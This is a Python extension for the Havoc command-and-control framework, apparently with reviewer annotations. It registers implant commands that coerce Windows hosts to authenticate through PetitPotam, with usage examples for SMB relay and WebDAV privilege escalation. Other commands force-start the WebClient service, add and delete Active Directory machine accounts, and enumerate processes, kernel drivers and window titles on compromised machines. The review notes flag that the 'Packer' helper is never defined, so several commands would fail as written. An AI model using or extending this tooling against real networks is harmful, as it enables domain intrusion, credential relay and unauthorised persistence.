from havoc import Demon, RegisterCommand
from struct import pack, calcsize
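def petitpotam(demonID, *param):
    """Task the demon to run the PetitPotam BOF against one host.

    Usage (see the RegisterCommand entry): petitpotam [Capture Server] [Target].
    ``param[0]`` is the capture server the coerced host should authenticate
    to, ``param[1]`` is the host to coerce.

    Returns the console task id on success, or False after printing a usage
    error when the argument count is not exactly two.

    NOTE(review): ``Packer`` is neither imported nor defined in the visible
    part of this file (the otherwise unused ``struct`` import suggests the
    usual Havoc helper class was meant to live here) — confirm it is in
    scope, otherwise every argument-taking command raises NameError.
    """
    demon = Demon(demonID)

    if len(param) != 2:
        demon.ConsoleWrite(demon.CONSOLE_ERROR, 'Only accepts two parameters [Capture Server, Target]')
        return False

    # The argument order follows the registered usage string. The original
    # validated the count but never read the values, so the BOF always
    # received two empty strings.
    capture_server, target = param

    # Pack order (target first, then capture server) is kept from the
    # original and deliberately differs from the usage order — confirm it
    # against the BOF's argument parsing before changing either.
    packer = Packer()
    packer.addWstr(target)
    packer.addWstr(capture_server)

    TaskID = demon.ConsoleWrite(demon.CONSOLE_TASK, "Tasked demon to coerce target with PetitPotam")
    demon.InlineExecute(TaskID, "go", f"bin/petitpotam/PetitPotam.{demon.ProcessArch}.o", packer.getbuffer(), False)
    return TaskID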
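def smbinfo(demonID, *param):
    """Task the demon to run the Smbinfo BOF against one host.

    Usage: smbinfo [Hostname]. Returns the console task id, or False after
    a usage error when exactly one argument is not supplied.
    """
    demon = Demon(demonID)

    if len(param) != 1:
        demon.ConsoleWrite(demon.CONSOLE_ERROR, 'Usage: smbinfo [Hostname]')
        return False

    # The original never copied the argument into the buffer, so the BOF
    # was always asked about an empty hostname.
    hostname = param[0]

    packer = Packer()
    packer.addWstr(hostname)

    TaskID = demon.ConsoleWrite(demon.CONSOLE_TASK, "Tasked demon to get remote system version info")
    demon.InlineExecute(TaskID, "go", f"bin/smbinfo/Smbinfo.{demon.ProcessArch}.o", packer.getbuffer(), False)
    return TaskID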
def startwebclient(demonID, *param):
    """Task the demon to run the StartWebClient BOF.

    The BOF takes no arguments; anything passed in ``param`` is ignored.
    Returns the console task id.
    """
    demon = Demon(demonID)
    TaskID = demon.ConsoleWrite(demon.CONSOLE_TASK, "Tasked demon to force start the Web Client service")
    bof_path = f"bin/startwebclient/StartWebClient.{demon.ProcessArch}.o"
    demon.InlineExecute(TaskID, "go", bof_path, b'', False)
    return TaskID
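def addmachineaccount(demonID, *param):
    """Task the demon to run the AddMachineAccount BOF.

    Usage: add_machine_account [Computer Name] [Password]. Returns the
    console task id, or False after a usage error when the argument count
    is not exactly two.

    The password is passed as a plain command-line argument; presumably it
    ends up wherever the operator console keeps command history — confirm
    before using a value you care about.
    """
    demon = Demon(demonID)

    if len(param) != 2:
        demon.ConsoleWrite(demon.CONSOLE_ERROR, 'Usage: addmachineaccount [Computer Name] [Password]')
        return False

    # The original validated the count but packed two empty strings
    # instead of the supplied values.
    computername, password = param

    packer = Packer()
    packer.addWstr(computername)
    packer.addWstr(password)

    TaskID = demon.ConsoleWrite(demon.CONSOLE_TASK, "Tasked demon to use Active Directory Service Interfaces (ADSI) to add a computer account to AD.")
    demon.InlineExecute(TaskID, "go", f"bin/machineaccount/AddMachineAccount.{demon.ProcessArch}.o", packer.getbuffer(), False)
    return TaskID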
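def delmachineaccount(demonID, *param):
    """Task the demon to run the DelMachineAccount BOF.

    Usage: del_machine_account [Computer Name]. Returns the console task
    id, or False after a usage error when exactly one argument is not
    supplied.
    """
    demon = Demon(demonID)

    if len(param) != 1:
        demon.ConsoleWrite(demon.CONSOLE_ERROR, 'Usage: delmachineaccount [Computer Name]')
        return False

    # The original never read the argument, so the BOF was always asked to
    # delete an account with an empty name.
    computername = param[0]

    packer = Packer()
    packer.addWstr(computername)

    TaskID = demon.ConsoleWrite(demon.CONSOLE_TASK, "Tasked demon to use Active Directory Service Interfaces (ADSI) to delete a computer account from AD.")
    demon.InlineExecute(TaskID, "go", f"bin/machineaccount/DelMachineAccount.{demon.ProcessArch}.o", packer.getbuffer(), False)
    return TaskID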
def getmachineaccountquota(demonID, *param):
    """Task the demon to run the GetMachineAccountQuota BOF.

    No arguments are packed; ``param`` is ignored. Returns the console
    task id.
    """
    demon = Demon(demonID)
    message = "Tasked demon to use Active Directory Service Interfaces (ADSI) to read the ms-DS-MachineAccountQuota value from AD."
    TaskID = demon.ConsoleWrite(demon.CONSOLE_TASK, message)
    bof_path = f"bin/machineaccount/GetMachineAccountQuota.{demon.ProcessArch}.o"
    demon.InlineExecute(TaskID, "go", bof_path, b'', False)
    return TaskID
def psc(demonID, *param):
    """Task the demon to run the Psc BOF (no arguments).

    ``param`` is ignored. Returns the console task id.
    """
    demon = Demon(demonID)
    TaskID = demon.ConsoleWrite(demon.CONSOLE_TASK, "Show processes with established TCP and RDP connections.")
    bof_path = f"bin/pstools/Psc.{demon.ProcessArch}.o"
    demon.InlineExecute(TaskID, "go", bof_path, b'', False)
    return TaskID
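def psx(demonID, *param):
    """Task the demon to run the Psx BOF (process listing).

    Arguments are currently ignored: a "detailed" mode that would pack
    ``param[0]`` as a string was sketched in a comment but never finished
    (the sketch itself did not run), so the plain listing is always
    requested. Returns the console task id.

    NOTE(review): the argument buffer is the two ASCII characters ``b'00'``
    (0x30 0x30), not two NUL bytes — confirm that is what the BOF expects
    before relying on it.
    """
    demon = Demon(demonID)
    TaskID = demon.ConsoleWrite(demon.CONSOLE_TASK, "Show information from all processes running on the target system.")
    demon.InlineExecute(TaskID, "go", f"bin/pstools/Psx.{demon.ProcessArch}.o", b'00', False)
    return TaskID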
# def psxx(demonID, *param):
# TaskID : str = None
# demon : Demon = None
# demon = Demon( demonID )
# TaskID = demon.ConsoleWrite(demon.CONSOLE_TASK, "Show more detailed information from all processes running on the target system.")
# demon.InlineExecute( TaskID, "go", f"bin/pstools/Psx.{demon.ProcessArch}.o", b'', False )
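def psm(demonID, *param):
    """Task the demon to run the Psm BOF for one process id.

    Usage: psm [process id]. ``param[0]`` must be a non-negative decimal
    integer; it is packed as an int for the BOF. Returns the console task
    id, or False after a console error on a wrong argument count or a
    non-numeric / negative pid.

    The original packed a hard-coded pid of 0, tasked the demon, and only
    then raised NotImplementedError — so the implant executed the BOF for
    pid 0 on every call and the command never returned a task id. The int
    packing is kept from that version; confirm it matches the BOF's
    argument parsing.
    """
    demon = Demon(demonID)

    if len(param) != 1:
        demon.ConsoleWrite(demon.CONSOLE_ERROR, 'Usage: psm [process id]')
        return False

    try:
        processID = int(param[0])
    except ValueError:
        demon.ConsoleWrite(demon.CONSOLE_ERROR, f'Process id must be an integer, got {param[0]!r}')
        return False
    if processID < 0:
        demon.ConsoleWrite(demon.CONSOLE_ERROR, 'Process id must not be negative')
        return False

    packer = Packer()
    packer.addint(processID)

    TaskID = demon.ConsoleWrite(demon.CONSOLE_TASK, "Show detailed information from a specific process id (loaded modules, tcp connections etc.).")
    demon.InlineExecute(TaskID, "go", f"bin/pstools/Psm.{demon.ProcessArch}.o", packer.getbuffer(), False)
    return TaskID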
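def psw(demonID, *param):
    """Task the demon to run the Psw BOF (window titles; no arguments).

    ``param`` is ignored. Returns the console task id — the original fell
    off the end and returned None, unlike every sibling command.
    """
    demon = Demon(demonID)
    TaskID = demon.ConsoleWrite(demon.CONSOLE_TASK, "Show Window titles from processes with active Windows.")
    demon.InlineExecute(TaskID, "go", f"bin/pstools/Psw.{demon.ProcessArch}.o", b'', False)
    return TaskID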
def psk(demonID, *param):
    """Task the demon to run the Psk BOF (no arguments).

    ``param`` is ignored. Returns the console task id.
    """
    demon = Demon(demonID)
    TaskID = demon.ConsoleWrite(demon.CONSOLE_TASK, "Show detailed information from the windows kernel and loaded driver modules.")
    bof_path = f"bin/pstools/Psk.{demon.ProcessArch}.o"
    demon.InlineExecute(TaskID, "go", bof_path, b'', False)
    return TaskID
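# Command registrations. Each entry binds a handler above to its console
# name, help text, usage string and an example invocation; the handlers
# themselves enforce the argument counts the usage strings advertise.

# PetitPotam
RegisterCommand(petitpotam, "", "petitpotam", "Coerce Windows hosts to authenticate to other machines via MS-EFSRPC", 0, "[Capture Server] [Target]", """
SMB Relay Attack : petitpotam KALI DC2019
WebDAV LPE Attack : petitpotam KALI@80/nop localhost
WebDAV LPE w/SOCKS and rportfwd : petitpotam localhost@80/nop localhost
""")

# SMBInfo
RegisterCommand(smbinfo, "", "smbinfo", "Gather remote system version info using the NetWkstaGetInfo API.", 0, "[Hostname]", "CASTELBLACK")

# Web Client
RegisterCommand(startwebclient, "", "start_webclient", "Force start the Web Client service.", 0, "", "")

# Machine Account
RegisterCommand(addmachineaccount, "", "add_machine_account", "Add a computer account to the Active Directory domain.", 0, "[Computer Name] [Password]", "PIVOT n3rdl0l")
# Help text said "to the ... domain" for a delete; corrected to "from".
RegisterCommand(delmachineaccount, "", "del_machine_account", "Delete a computer account from the Active Directory domain.", 0, "[Computer Name]", "PIVOT")
RegisterCommand(getmachineaccountquota, "", "get_machine_account_quota", "Read the ms-DS-MachineAccountQuota value from AD", 0, "", "")

# PS Tools (Psx, Psc, Psm, Psw, Psk)
RegisterCommand(psc, "", "psc", "Show processes with established TCP and RDP connections.", 0, "", "")
RegisterCommand(psx, "", "psx", "Show information from all processes running on the target system.", 0, "", "")
# psxx (detailed Psx) is not implemented; its registration stays disabled.
# RegisterCommand(psxx, "", "psxx", "Get detailed information from processes with established TCP and RDP connections.", 0, "", "")
RegisterCommand(psw, "", "psw", "Show Window titles from processes with active Windows.", 0, "", "")
RegisterCommand(psm, "", "psm", "Show detailed information from a specific process id (loaded modules, tcp connections etc.).", 0, "[process id]", "4932")
RegisterCommand(psk, "", "psk", "Show detailed information from the windows kernel and loaded driver modules.", 0, "", "")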